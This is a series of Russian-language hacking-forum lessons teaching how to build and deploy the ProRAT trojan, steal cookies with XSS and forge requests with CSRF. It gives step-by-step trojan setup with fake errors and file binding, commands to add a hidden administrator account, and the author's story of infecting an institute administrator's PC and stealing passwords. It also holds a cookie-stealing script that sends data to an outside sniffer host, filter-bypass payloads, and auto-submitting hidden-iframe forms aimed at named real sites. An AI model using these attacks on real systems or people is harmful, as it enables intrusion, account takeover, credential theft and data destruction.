http://ВНИМАНИЕ! Тут должна была быть ссылка на depositfiles.com, скорее всего это вирус или троян!/files/8679846

А теперь давайте рассмотрим эту программу.

Распаковываем архив в любое место....и открываем программу ProRat

И первым же делом хочу сказать минус этой программы.....она работает только в локальной сети....и тех у кого статичесий
IP(тоесть никогда не изменяется) (Естественно со стороны сервера)
//надеюсь что вы понимаете что локальная сеть это не только компы подсоединённые друг к другу проводами)))
Но это не обломно ...ибо её можно применить на работе....в школе....в инсте....тут зависит только от вашего
воображения...

Первым делом нам надо сделать сам троян (Сервер) кто забыл ....сервер это компьютер предоставляющий свои услуги.....=)
в нашем случае это компьютер жертвы......(тоесть файл который будет открывать атакуемый)

и чтобы сделать этот файл....мы должны перейти во вкладку Create --- Create ProRAT Server
И после этой процедуры первая вкладка будет
Notifications (Оповещения) - эта вкладка отвечает за то чтобы настроить оповецение о том что этот файл открыли....
//тут вы можете настроить оповещение по ICQ Mail CGI логу))) но эта вкладка не интересна....ибо почти во всех
случаях оповещение либо глючит либо вообще не работает.....Но кому интересно можете попробовать.

General Settings  вот эта вкладка очень важная....сдесь мы должны  установить парольна Сервер и ваше имя для
сервера Victim Name
Огромная просьба ...обратите внимание на пароль....ибо если вы его оставите по дефалту (123456) то тогда любой
грамотный хакер ....да и безграмотный может просканировать деапозон IP на открытые порты.... найдёт 5110 порт...
и поймёт что это ProRAT и то что к нему можно подключиться.....(а темболее это губительно если вы на себе тэстируете
программу)
А что касается имени...оно особо не понадобится.....оно только понадобится для переписки (про которую я напишу позднее) а пока ставьте свой ник.
Порт оставьте 5110 ....
Ну и последнее что пожалуй нас заинтересует...это Give a fake error massage  (Выдать ложную ошибку) тоесть после
открытия троя ...вылетит ошибка...текст которой можете написать вы....нажав на Configure и редактируете текст ошибки.
// и вот еще что....подумайте перед тем как поставить эту галочку...а надо ли вам она?(отвлекать пользователя
разными ошибками =) )

Bind with File
//вот собственно почему я и писал....а надо ли вам это....если в следующей вкладке можно скрепить файл с файлом.....
тем самым не привлекать внимания пользователя ошибками....а привлечь внимание программой.....вордовским файлом.....
или еще чем...

Bind Server with a file(Скрепить файл сервера с другим файлом)если хотите воспользоваться этой функцией ставим галку...
и выбираем файл при помощи Select file.

Select Server Extension(выбор вида файла на выходе)
Тоесть какого расширения вы хотите файл...досовский фай .com или программу .exe или батовский файл .bat...
но учтите что только под SCR и EXE потдерживаются иконки....(вставление ложных иконок)

Server Icon
Тут мы собственнои и выбираем иконку....для нашего файла

После чего мы успешно закончили нашу установку....и жмём Create Server

У нас получился новый файл в папке под имение Server .....
______________________________________________________________________________
Вот собственно мы и сделали наш вирус)))

Теперь его функционал....
После того как вы запустили его на машине другово пользователя....находящегося в локальной сети или имеющий
статический IP
мы можем выполнить вот какие действия (уже со совей машины...)//Но перед этим нам стоит подключиться к этой
машине....)))
и делаем мы это так.... в поле IP пишем айпи машыны жертвы....
вот как можно узнать IP жертвы....
1)Сделать финт ушами....тоесть склеить ПроРАТ вместе с Пинчом.....(а как вы помните он отображает информацию
о подключении)
2)Тупо посмотреть IP с его машыты.....набрав в Выполнить ipconfig /all ( а там будет поле IP-адрес)
3)Воспользоваться анализатором сети.....Advanced LAN Scanner http://www.radmin.ru/products/utilities/lanscanner.php

//но чаще всего такой возможности не выпадает ибо его надо установить...а мы представляем что мы ограниченны
в рамка....так что можно воспользоваться еще одним финтом....
4)Узнать IP жэртвы можно попросив её перейти на http://old.antichat.ru/cgi-bin/s.jpg
а самому ждать тут http://old.antichat.ru/sniff/log.php ....и после того как вы почуствовали что он уже мог
зайти.....обновляйте...и первая строка будет примерно такой...

[Sun Oct 12 01:16:58 2008] IP=78.116.93.120 SITE=
    REFERER=
    QUERY=
    AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Где IP это IP жертвы...

5)Или тупо узнать через виндовское приложение......(подключения)

И так мы узнали IP теперь вставляем его к нам в ProRATв поле IP ,Порт если вы не изменяли...то оставляем такой
же ..и жмём Connect
Если у вас всё получилось то у вас запросят пароль который мы указывали...для подключения к серверу.//набираем
его и ОК

Всё мы приконнектились....
Теперь я рассмотрю самые важные для нас функции этой программы.

1) это возможность управлять файлами...(просматривать,удалять , скачивать,закачивать)
И чтобы это сделать мы переходим во вкалдку File Manager --- Refresh
и вот перед нами открылась файловая система другово компьютера....
с такими вкладками как Upload (загрузить на сервак) Download(Скачать с сервакак) Delet (удалить) Run (выполнить)
....создать деррикторию итд...мы можем всё! А то что мы можем всё я вам докажу на личном примере....но об этом
чуть ниже....

2)Следующая вкладка на основном меню которая важна для нас...это Registry(Реестр) при помощи этой вкладки мы
можем изменять реестр .....лазяя по нему в релальном времени))))Для этого нужно перейти
Registry --- и в поле Root key выбирать в каие ключи ты хочешь редактировать....

3)KeyLogger (название говорит само за себя....
Это кийлогер...для тех кто забыл ...это (шпион клавы) тоесть считывает все нажатые на компе клавишы и передаёт
их нам....в виде лога
для того чтобы воспользоваться этой функцией жмём...
Keylogger---Read Log //и периодически нажимайте Read Log так как он сам не обнавляет нажатые клавиши....а если
вы так нажмёте то он обновит....

4)Services Manager
Для нас это тоже очнеь важная фишка....так как тут не только можно наблюдать за всеми процессами которые
выполняются...но и откючать их.
Services Manager --- (выбераете процесс) и выбераете действие Старт\Стом\Удалить\Авто запуск..

5)Screen Shot делаем скрины удалённого компа....
Screen Shot -- Screen Shot[Method1] и все сделанные скрины сохраняются для того чтобы открыть сохранённые
рисунки нужно нажать Open Images Directory

6)Give Damage
Моя самя любимая функция....)))удаляем все дрова.....у удалённого компа...сделать это можно
Give Davage -- Format Drives

7)Run(название говорит само за себя...."запуск")
От сюда можно запускать vbs скрипты...ключи реестра...батовские файлы.....команды MSDOS`a а это очень
полезная вещь однако....

Вот один из ДОСовских финтов....
Net user xakep(<-логин) admin(<-пароль) /add
Вот как в чистом виде выглядит
Net user xakep9009 admin /add       //это мы создали новую учётную запись на удалённом компьютере)))
А чтобы присвоить ей права администарора пишем...
Net localgroup administrator(<--это группа к которой мы присваиваем) xakep9009(<--а это кого присваеваем) /add
В чистом виде это выглядит так...
Net localgroup administrator xakep9009 /add

8)Applications
При помощи этой фишки можно удалять процессы программ которые выполняются сейчас....тоже мега важная вещь.....

Ну а дальше идут чисто фишки чтобы побаловаться.....и мне они не очень нравятся....но я их перечислю....
9.1)Funny Stuff
Она включает в себя
Закрытие\Открытие сидирома
Всякого рода стёба над видом рабочего места...
Скрытие значков с рабочего стола.....скрытие часов...кнопки пуск.....переворачивание монитора.....(рабочий
стол переворачивается верх головой)Заблокировать мыш....заставить её бегать по экрану хаотично....
9.2)IExplorer
Разного рода проделки с бедным браузером....
Задание домашней странички....изминение его титула......(чтобы назывался не IExplorer а любое другое название)или
просто перейти по ссылке.....
9.3)Shut Down PC
Выключение ...перезагрузка.....спящий режим....
9.4)Chat
Переписываться с жертвой чтобы она ничего не могла сделать....кроме как ответить вам......
9.5)Massage
Сообщение....в виде ошибки.....

____________________
Ну и пожалуй я забыл еще сказать про PC info (из основных вкладок)
PC info -- System information
и видим информацию о системе....или вот еще Last visitied  25 site (25 последних сайтов которые были открыты)

вот собственно тут я подведу точку в описании и расскажу свой личный опыт....как я "поработал с этой прогой"

Месяц назад мне друг закриптовал приватным криптором эту замечатильную вещь и я сразу пошёл в инст. пробовать))))
У нас все компы в локалке.....и один комп главный.....там сидит администратор....я попросил как обычно открыть мою
презентацию чтобы её отредактировали ....но только её попытались открыть вылетела ошибка "Ваш файл повреждён!"....
я с огорчением ушёл на пол часа.....
Потом вернулся снова...чтобы типа посёрфать инет....подключил флешку...открыл ПРОрат и подключился к компу
проделал финт с ДОС командами и у меня в кармане была свежая учётка Админа......но на этом я не успакоился...
отключил антивирус....и скопировал с флехи пинч...на ту машину....и запустил....на моё удивление пассы админов
были сохранены......и аккуратно перескачили ко мне))))но я их увидил только дома......стёб над Админами я не
проводил....так как это люди как ни как)))

Заключение.

1)Мы с вами познакомились с такой известной хак тулзой как  ProRAT
2)Рассмотрели несколько способов как можно получить IP в локальной сети...или просто
3)Ознакомились с основными функциями этой программы
4)Узнали про эмулятор доса (вернее про то что он не бесполезен)//финт с MSDOS
5)Узнали...или повторили что такое статически IP
6)Ну и конечно познакомились с таким видом атаки как Backdoor //теперь если услышите можете сказать....
а я тоже могу провести backdoor.

___________________________________________________________

Ну собственно я хотел чтобы в 9ом уроке мы уже начали нападение про сайты изучать....но что то мне
приспичело вас познакомить с backdoor`ом.......и я еще подумал...что юбилейный урок должен быть мега супер пупер....
и я эту тематику(взлом WEB) оставил для него....
Надеюсь вы что то новое узнали для себя.

_________________________________________________________________________________________

Да и кстати радостная весть про людей озабоченных с пинчём)))
Я недавно разобрался как можно вам помочь чтобы парсер у вас работал.....
Удалите всё из папки Reports
Открываем Реестр ...жмём
Moй компьютер (ВАЖНО ПОСТАВЬТЕ КУРСОР НА ЭТУ ВЕТКУ , ТОГДА ПОИСК НАЧНЁТСЯ С САМОГО НАЧАЛА) ---- Ctrl+F ---
Parser2 (можете прямо скопировать что искать....)--(после чего удаляете все ключи связанные с Parser2
(там где присутствует это слово....)

После чего....сохрание ваши отчёты (.bin) на рабочий стол......
Перенисите Parser2 обратно в папку Reports откройте Parser2 опять сделайте дефалтные настройки......
и после этого перетащите отчёты с рабочего стола.....на белое поле программы Parser2 ....
и у вас откроится отчёт.....(если обасобить...то вы просто перетаскиваете отчёт в программу)

А если не получится....проделайте всё еще раз...начиная с очистки реестра...только в этот раз не создавайте
заново дефалтные настроки в Парсере....он их уже сохранит....просто перетаците .bin файл в Парсер......

0

9

http://newhackers.mybb.ru/img/avatars/000a/71/82/2-1250716879.gif
Урок 10.

XSS

_________________________________________________

Свернутый текст

А начну я пожалуй с нашей защиты....для того чтобы нас не нашли...нам
надо использовать Proxy
но с ними вечно проблеммы так-как он очень быстро портится....и очень медленный...
А я вас познакомлю с такой программой как Tor.
Скачать его можно тут
http://www.torproject.org/download.html.ru
Он работает по принцыпу....вы седите через другово пользователя подключенного к
этому сервису ...а тот пользователь через другово....а тот через другово....а тот
в свою очередеть через другов.....а тот....=)
Короче фиг найдёшь исходного человека....
После того как вы установили Tor и установили плагин на ваш стандартный браузер
у вас появится в правом нижнем углу (вашего браузера) Tor отключён после
нажатия на эту надпись он включится......
Иногда бывает что тот через кого вы седите.......очень тормознутый...или
находится в другой стране ...в которой запрещён вход на тот сайт который
вы хотите......чтобы сменить этого пользователя отключитесь от тора.....а
потом еще раз включите его...//это делается двумя щелчками в правый нижний угол вашего браузера.....
вот теперь можно преступать.
_________________________________________________

Эта аббревиатура переводится как cross site sсriрting (меж сайтовый скриптинг)
тоесть внедрение произвольного кода (скрипта).
Как вы заметили вместо буквы C поставили X  для того чтобы не путать с
CSS (Каскадные таблицы стилей) //то что вы должны были изучить вместе с html

Этот вид атаки мой самый любимый....так как большинство программистов
пренибрегают этим видом атаки...считая его не дееспасобным....
тем самым отказываются закрывать дырки из-за ненадобности.....

Для того чтобы определить присутствует ли эта уязвимость ....вам достаточно
подставить специальный скрипт(см.ниже)...в различные переменные,в
ПМ(сообщения проходящие по этому сайту) в поисковик(раположенный на этом сайте),
в любые поля где можно что то заполнить....

'><sсriрt>alert('Xakep9009_Rullzz')</sсriрt>

В место Xakep9009_Rullzz Вы можете написать любой текст.....
а '> я применил для того чтобы быть уверенным что мы закрыли последний
тэг....который прописанн уже в самом сайте......

Если данный вид уязвимости присутствует то вы увидите вот что...
(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E

Как вы видите .....я подставил '><sсriрt>alert('Xakep9009_Rullzz')</sсriрt>
в переменную  order.
Кстати вы наверное заметили как наш скрипт приобразился.....
в место '><sсriрt>alert('Xakep9009_Rullzz')
</sсriрt> стал %27%3E%3Csсriрt%3Ealert(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E
Ко второму виду записи была применена URL encode (шифровка символов в URL)
В дальнейшем мы будем делать это для того чтобы обходить фильтры......
А закодировать любое слово или фразу можно при помощи вот этого сайта.....
http://www.w3schools.com/TAGS/ref_urlencode.asp

Пример:стоит фильтр на символ ' мы набираем вместо этого символа %27 и обходим этот фильтр.

XSS бывают пасивные и активные

1)Пасивные XSS это такой вид который требует от жертвы какого то действия
чаще всего это перехода на определённую ссылку....

(%27Xakep9009_Rullzz%27)%3C/sсriрt%3E

Вот это пасивная XSS так как чтобы она работала на хакера....нужно заставить жертву перейти по ней.....

2)Активные Это те XSS которые не требуют от пользователя особо напрягаться.....
тоесть переходить по ссылкам.....которые мы иму скажем....

Теперь давайте рассмотрим Активные XSS
Для этого зарегистрируйтесь вот тут....
http://shurem.ru/index.php?action=2 //регистрация не требует ничего кроме ввода логина и пароля....

После регистрации открываем http://shurem.ru/mess_frm.php
И мы попадаем в раздел создания и отправки писем.....
Теперь вписываем в тему письма            "<sсriрt>alert('Xakep9009_Rullz')</sсriрt> Привет."
А в само письмо <sсriрt>alert('Hellow_World')</sсriрt>

И чтобы проверить наличие уязвимости отправляем письмо самому себе ...... тоесть в поле Получатели пишем свой ник...
И получаем сообщение ....

Теперь вы каждый раз перейда на http://shurem.ru/mess_lst.php эту страничку
(пока не удалите сообщение) будете видеть вылетающую ошику.

То что в поле "Тема" присутствует уязвимость мы разобрались...а как насчёт
самого псьма.....
Зайтиде в него.....(нажав на тему "Привет.")
И вы увидели что Вылетела ошибка с надпесью Hellow_World Это означает ....
что XSS присутсвует не только в поле Тема но и в самом тексте сообщения.

Полазяв по этому сайту еще пару минут обнаружил что скрипты можно вставлять не только в тему сообщения
...в само сообщение....но и даже в личную информацию....!!!!

Заходим в http://shurem.ru/user_inf.php
и редактируем свою информацию.....
Допустим в сведенья пишем нашу стандартную фишку <sсriрt>alert('xss')</sсriрt>
И каждый кто откроет нашу анкету будет видеть эту вылетающую ошибку....

Мы с вами разобрались с Пасивными и Активными XSS , а теперь нам надо понять....а для чего
нам они вообще нужны.....(эти найденые дыры)
Есть много вариантов их применения .....допустим найдя на каком то из известных ресурсов
XSS можно похвастаться девушке и написать ей любовное сообщение в виде ошибки.

Но это мы оставим на потом....потому как основное применение этой уязвимости для того
чтобы своровать Cookies.
Если сказать своими словами...то в Cookies`ax хранится информация о входе пользователя
на определённый ресурс.....и сохраняется эта информация в браузере....узнав Cookies от определённого сайта
мы сможем зайти на него под тем пользователем ....у которого мы украли эти Кукисы.....
//но это я рассказал вам со своих слов .... более полную информацию получите тут
http://ru.wikipedia.org/wiki/HTTP_cookie

А теперь давайте применим наши найденные уязвимости на практике....не поленитесь и создайте
еще одного пользователя....

Это для лучшего усвоения.
Допустим
qwerty1 - хакер
qwerty2 - атакуемый

Теперь нам надо найти сниффер Кукисов...
И мы будем использовать с вами Античатовский сниффер.
Ибо он хороший...но только для паблика.
Потому что какой нибуть Олень вопхнёт ссылку на форум....и скажет что там Мега порно...
люди переходят....а так как XSS там не присутствует Куккисы не воруются....а приходят
чисто пустые поля.....с адресом сайта Refere .....тем самым просто флудят лог.

Входим под Хакером в моём случае это Qwerty1
Редактируем свою страничку
http://shurem.ru/user_upd.php

Вот таким образом.....пишем в поле Сведенья
<sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt>

Выходим из Хакера и переходим вот сюда
http://old.antichat.ru/sniff/log.php сдесь вы увидите что тут уже присутсвует одна запись с
сайта Referer=http://www.Shurem.ru Итд.
Это вы только что пропалили свои кукисы....=) так как страничка после нажатия редактировать
перекидывает вас на неё....только уже отредактированную =)))

( не закрываем античатовскую страничку)
Входим под пользователем жертвой....в моём случае это qwerty2 и переходим на страничку
  http://shurem.ru/user_inf.php?user=qwerty1
Где qwerty1 это ник Хакера.

Обновляем страничку ЛОГА и получаем

[Sun Oct 12 20:24:37 2008] IP=78.106.95.120 SITE=shurem.ru
   REFERER=http://shurem.ru/user_inf.php?user=qwerty1
   QUERY=PHPSESSID=cb5185cf87ea38c06fec30afb4622fcf
   AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3

//выходим из qwerty2 (атакуемого)

Где REFERER это откуда пришёл этот человек.
IP он и в африке IP
и нас интересует третяя строчка.....
QUERY=PHPSESSID=cb5185cf87ea38c06fec30afb4622fcf //это и есть кукисы....которые нам нужно подменить...а
сделать это нужно при помощи Opera браузер....
К сожалению Фаер фокс (который стоит у меня ) этого не умеет а уж про Осла и говорить то нечего....
Качаем Оперу.....(если нету) от сюда http://ru.opera.com/

Меняем Кукисы

1)Входим из под Оперы под Хакером.....на этот сайт
//это делается для того чтобы Опера сохранила кукисы Хакера....и потом было что подменять.....в место них...
//если бы мы этого действия не проделали у нас бы было пустое поле в кукисах от этого сайта..(тобишь небыло
бы того что нужно подменять)
2)Заходим во вкладки Оперы
Инструменты---Настройки---Дополнительно---Cookies---Управление Cookies---(находим тот сайт которого кукисы нам
нужно подменить)открываем эту папку --- Выделяем Кукисы (которые были в этой папке) --- Изменить и дальше
изменяем....
В нашем случае в поле Имя это будет
PHPSESSID
А значение
cb5185cf87ea38c06fec30afb4622fcf
Сохраняем.....и жмём Ок....
3)После чего Обновляем страничку и видим что мы под атакуемым пользователем)))вернее под поражонным пользователем.....
Посмотреть под каким вы пользователем сейчас идите можно так http://shurem.ru/user_inf.php

_______________________________________________________________________________________

Я рассмотрел только один способ своровать Кукисы ....а их там мы с вами нашли 4....
//надеюсь встретив в дальнейшем такую уязвимость вы сможете её применять......

Теперь немножечко поговорим о фильтрыах и методах обхода.....
Фильтры используются для того чтобы обезопасить свой ресурс от таких нелепых ошибок.....которые могут привести
к тому что вы захватите админку.

Фильтров очень много .....=) и для каждого нужен собственный подход.....

Рассмотрим несколько способов обхода .....
1)Этот способ я уже описывал выше...
про то что можно "закодировать" запрос в URL ......
Этот способ особенно актуален для обхода фильтрации знаков  "  '  < > / . итд.
2)Это по другому сформулировать запрос.....
Допустим заприщены слова <sсriрt> и </sсriрt>
Тогда заменим их на вот такой запрос....

<hr style=`background:url(javasсriрt:alert('xss')\;alert('xss'))`>

3)Иногда программеры со своими фильтрами до такой степени задалбываются ....что тупо прописывают комбинации
которые нельзя писать....
Пример: <sсriрt> и </sсriрt> фильтр может отфильтровать эти запросы.....потому как они строго прописанны....
А если написать <sсriрt> и </sсriрt> то их он пропустит.....

4)
Я бы мог вам еще мог долго рассказывать как можно обойти фильтрацию.....но не буду ...так как очень много
примеров уже написали до меня.....
(и которые я  сам заимствую)
Поэтому кому будет интересно посмотрите различные виды обхода Фильтров.....тут
http://www.xaker.name/forvb/showthread.php?t=6235
http://www.ua-admin.com/ru/hackzone/pri … amp;cat=19
http://old.antichat.ru/crackchat/HTML/
http://www.dsec.ru/about/articles/web_xss/  //обязательно посмотрите ибо помогает обходить фильтрацию скриптов
при помощи изображения =)

Наконец что же за скрипты мы такие впихивали ....=-) и на чём они написанны.....раскрою секрет мы использовали
javasсriрt`ы  для использования и нахождения этой уязвимости. (XSS)

Заключение.

В этом уроке мы с вами узнали о
1)Таком виде атаки как XSS
2)На практике узнали как можно использовать пасивные и активные XSS
3)Научились искать уязвимости связанные с XSS
4)Узнали что такое Cookies
5)На практике поменяли украденные Кукисы.
6)Знаем что такое фильтры и как с ним стараться бороться....
7)Теперь мы можем не бояться за свою приватность в сети....или в то время когда мы ломаем сайт....так как знаем что за зверь Tor....

_________________________________________________________________________________

Ну собственно всё.
На самом деле мог бы и лучше написать....так что зарание извиняюсь....но вы сами прикиньте 2 раза переписывать и всё время ход мысли идёт по разному.....
Надеюсь из этого урока вы узнаете что то новое.
Удачи.
_____________________________________________________________________________________

Можно пропустить.
______________________________________________
Это ппц.....уже в третий раз переписываю статью......всё из-за моего упрямства.....
Люблю писать прямо в браузере.....
Энтузиазм пропал....но я постараюсь всё востановить.
______________________________________________

Урок 11.

XSRF

aka (also known as) Cross Site Request Forgery
Эта уязвимость мега крутая.....=)

Суть её заключается в том....что сайт при выполнении определённых действий со стороны пользователя не проверяет откуда пришёл запрос на это действие.....
Приведу пример чтобы было понятнее.....
Допустим вы сидите vkontakte и вас попросил друг (видя то что вы сидите сейчас в контакте) перейди на его сайт с супер пупер картинкой...или еще с чем....
Вы переходите.....и в это же время от вас отправляется сообщение одному из ваших друзей "Ты дурак ,и всё тут".
//Но вы не думайте это не все возможности XSRF }=)

Первым делом с чего я бы начал....это с создания....

Площадка для тестирования

Для того чтобы поднять свой уровень....нам нужно всё применять на практике.....и первое с чего я начну ....это с регистрации хостинга....

Для  этого урока нам понадобится банальная поддержка html страничек....так что обайдёмся narod.ru

И так...надеюсь с регистрацией всё прошло успешно....
После того как вы заригистрировались...вы можете создавать свой сайт.....

Для того чтобы создать его мы проделвыаем следующие действия
1)После того как вы вошли в свой аккаунт заходим сюда http://narod.yandex.ru/
2)Идём в Мастерскую (Мастерская)
3)Там где вы видете "Редактирование и Управление" нажмите "Управление файлами и HTML редактор"

И так мы поплаи в админку.
Здесь можно удалять....перемещать создавать.....папки и файлы......

Выделим создадим для нашего урока отдельную папку.... и назовём её "test"
Сделать это можно нажав "Создать папку" //далее даёте ей название

После чего в этой папке мы и будем химичить }=)
________________________________________________________________________________________________________________

Теперь перейдём непосредственно к уязвимости.....её очень легко реализовать если ты знаешь html , а собственно такие тэги как
<input ...>
<form> </form>
Если кто не успел с ними познакомиться то вот вам ссылки
http://www.htmlbook.ru/html/input.html
http://www.htmlbook.ru/html/form.html

Практика.

И первое с чего мы начнём это практика.

Заходим на сайт fa-kit.ru и регистрируемся.

Перейдя вот по http://fa-kit.ru/user_pwd.php этой ссылке (после регистрации)
Вам предоставляется право помянять пароль....
Но мы то с вами заметили , что у нас не запрашивают старый пароль....значит можно попробовать нашу уязвимость.....

Открываем исходный код страницы....и он будет выглядеть так.....
______________________________________________________________________________
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/REC-html40/strict.dtd">
<HTML>
<HEAD>
<META name="Robots" content="all">
<META http-equiv="Cash-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=windows-1251" >

<LINK rel='stylesheet' type='text/css' href='main.css'></HEAD>
<bоdу>

<DIV class=title>Изменение пароля пользователя qwerty
</DIV>
<FORM method='POST' action='user_pwd.php'>
<table class="table" align="center">
<tr>
<td class='cell' align='right'><strong>Новый пароль:</strong>

</td>
<td class='cell' align='left'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='' size=12 maxlength=20>
</td>
</tr>
<tr>
<td class='cell' align='right'><strong>Повторите ввод пароля:</strong>
</td>
<td class='cell' align='left'>
<INPUT type='password' name='pass2' id='pass2' class='input' value='' size=12 maxlength=20>
</td>
</tr>
</table>
<DIV class='center'>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>

</DIV>
</FORM></bоdу>
</HTML>
______________________________________________________________________________

Как я уже сказал нам нужны всего то несколько тэгов....это <INPUT и <FORM

Так давайте избавимся от лишнего кода и оставим только нужное.....

_______________________________________________________________________________
<FORM method='POST' action='user_pwd.php'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='' size=12 maxlength=20>
<INPUT type='password' name='pass2' id='pass2' class='input' value='' size=12 maxlength=20>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>
</FORM>

_______________________________________________________________________________
Мы здесь видим что у нас есть 2 поля...куда нужно ввести переменные.....это pass1 и pass2 , а value='' это то куда надо вводить эти переменные....(значение)

Вводим в значение value='qwerty'(будующий пароль) и еще раз подтверждаем этот пароль.....тоесть у нас должно получиться

<FORM method='POST' action='user_pwd.php'>
<INPUT type='password' name='pass1' id='pass1' class='input' value='qwerty' size=12 maxlength=20>
<INPUT type='password' name='pass2' id='pass2' class='input' value='qwerty' size=12 maxlength=20>
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>
</FORM>

Далее нам нужно еще подредактировать наш код чтобы
1) Он работал не только с сервера
2) Нужно добиться того , чтобы пользователь не имел вариантов нажатия кнопки.....такие которые мы имеем сейчас..(чтобы он сразу согласился)
<INPUT type='submit' name='submit' id='submit' class='button' value='Принять'>
<INPUT type='button' name='back' id='back' class='button' value='Отменить' onclick='history.back();'>

Чтобы расправиться с первым пунктом.....нам нужно всего лишь поменять вместо
<FORM method='POST' action='user_pwd.php'>
Прописать полный путь к этой страничке....и у нас получится вот так....
<FORM method='POST' action='http://fa-kit.ru/user_pwd.php'>   //эта ошибка очень частая......не забывайте прописывать полный путь....

А для того , чтобы разобраться со вторым пунктом нужно присвоить форме имя....и прописать в <bоdу> авто загрузку этой формы.....(уже без выбора варианта....(тоесть как долженое)

И в конечном итоге у нас получится вот такой код.

<bоdу оnlоаd="document.forms['test'].submit();">      //Здесь используем имя формы для её выполнения(автозагрузки)
<FORM name="test" method='POST' action="http://fa-kit.ru/user_pwd.php">     //как вы видите мы задали имя форме name="test"
<INPUT type='hidden' name='pass1' id='pass1' class='input' value='qwerty'>
<INPUT type='hidden' name='pass2' id='pass2' class='input' value='qwerty'>
</FORM>
</bоdу>

Вот собственно мы с вами и приготовили ядовитый код.....

Если вы вышли с сайта fa-kit.ru
То зайдите еще раз туда.....

Затем сохраните выш написанный код как html страничку.....
И перейдите по ней.....

После чего ваш пароль поменяется....на тот который вы указали дважды в value=''

Теперь вы можете выложить этот html на народ(narod.ru) и если бы у вас был друг на том сайте зарегистрирован.....вы бы подкинули ему ссылку когда он сидит под своим пользователем на этом сайте...и его пароль бы поменялся на тот который вы бы указали

Очень важно чтобы пользователь сидел в это время под своим аккаунтом...когда вы кидаете ему эту ссыку.....

Собственно вся суть этой атаки и заключается в том что человек сидит под своим акком.....и перейдя по ссылке выполняет все действия(прописанные в коде)...которые он бы мог выполнить сам.....при помощи прав его аккаунта.
______________________________________________________________

Так же вы наверное заметили....что слишком уж бросается в глаза всё это....надо бы сделать это более незаметным....

А делается это очень легко.....
Мы просто создаём отдельный файл.....допустим вот с таким содержанием....
<html>
<title>
Good picture
</title>
<bоdу background="1.jpg"> //1.jpg это картинка....для того чтобы заинтирисовать пользователя....
<ifrаmе src="1.html" width="1" height="1"></ifrаmе>
//этим тэгом мы подгружаем страничку....1.html(в ней хранится наш "ядовитый" код) но так как там стаят параметры width="1" height="1" то человек просто ничего не увидит...а внимаельный пользователь увидит маленький квадратик=) это и будет наша страничка с XSRF.
</bоdу>
</html>
_______________________________________________________________________________________

Знаете как это не удивительно....но на forum.xakep.ru тоже присутствует XSRF....
Я уже давно заметил что можно накручивать себе рейтинг...

Ну и я решил попробовать повысить себе рейтинг =)))

Мы все знаем что за сообщение тоже можно ставить +сы и -усы.....и это тебе идёт в рэйтинг......

Так как мне регаться было лень.....(второго пользователя) то я решил воспользоваться паблик пользователем....
Он присутствует во всех популярных сайтах.....(его регают простые пользователи для того чтобы посмотреть скрытые сообщения итд.)
Таким пользователем оказался qazwsx у которого пароль тоже оказался не мудрёный..... кстати посмотрел я его историю...и тот кто под ним сидел...тоже задавал вопросы про XSRF =)))

И собственно я под этим пользователем чего только не мутил с рейтингом))))

Вот как я сформировал XSRF для накрутки рейтинга...

<bоdу оnlоаd="document.forms['proba'].submit();">
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
<input name="rating" type="hidden" value="2"/>
<textarea id="subject" name="subject" rows="7" cols="70" type="hidden">You are supper!!</textarea>
    <input name="m" value="1239766" type="hidden">
    <input name="u" value="0" type="hidden">
    <input name="forumid" value="275" type="hidden">
</form>
</bоdу>

Ну и дам пожалуй пояснение.....
1)http://forum.xakep.ru/rating.aspx?actio … ;m=1239766 это ссылка на то чтобы оценить мой пост....(я её достал пот пользователем qazwsx)
2)value="2" это значение....сколько надо поставить в рейтинг....(оно может быть от 2 до -2) я пробовал поствить 100 не прокатило
3)Всё что заключается в <textarea></textarea> это приписка (пояснение почему ты поствил такую оценку)
4)value="1239766" это id ссылки(идентификатор) он должен совпадать с "action=rate&m=1239766"

________________________________________________

Кроме этих примеров....при помощи XSRF Вы можете делать накрутку опросов...спамить гостивые книги....посылать от чужого имени сообщения....

Ну и под конец...не зря же мы регались на народе......

создайте файлик....1.html или файлики.....можете продолжить 2.html....
с вот такой начинкой....

<bоdу оnlоаd="document.forms['proba'].submit();">
<form method="post" action="http://forum.xakep.ru/rating.aspx?action=rate&m=1239766" name="proba">
<input name="rating" type="hidden" value="2"/>
<textarea id="subject" name="subject" rows="7" cols="70" type="hidden">You are supper!!</textarea>
        <input name="m" value="1239766" type="hidden">
        <input name="u" value="0" type="hidden">
        <input name="forumid" value="275" type="hidden">
</form>
</bоdу>

Только в место http://forum.xakep.ru/rating.aspx?actio … ;m=1239766 и  value="1239766" подставьте свои значения....их вы можете узнать от пользователя qazwsx...=)))

После чего создайте еще один html файлик с названием index.html
И напишите в него вот что.....
<html>
<title>
Good picture
</title>
<bоdу background="1.jpg"> //1.jpg это любая картинка.
<ifrаmе src="1.html" width="1" height="1"></ifrаmе> //тут вы подключили файлик....с XSRF Если у вас их больше то продолжите....
<ifrаmе src="2.html" width="1" height="1"></ifrаmе> //Если у вас их больше одного.....
</bоdу>
</html>

Теперь заходим в папку test.....и  там есть ссылка "Загрузить файлы"
Загружаете все ваши файлы....(картинка,index.html,1.html,2.html)

После чего можете любому форумчанину подкинуть вашу ссылку....она будет примерно выглядеть так....

http://xakep9009.narod.ru/test/index.html

И ваш рейтинг чуть чуть поднимится }=)

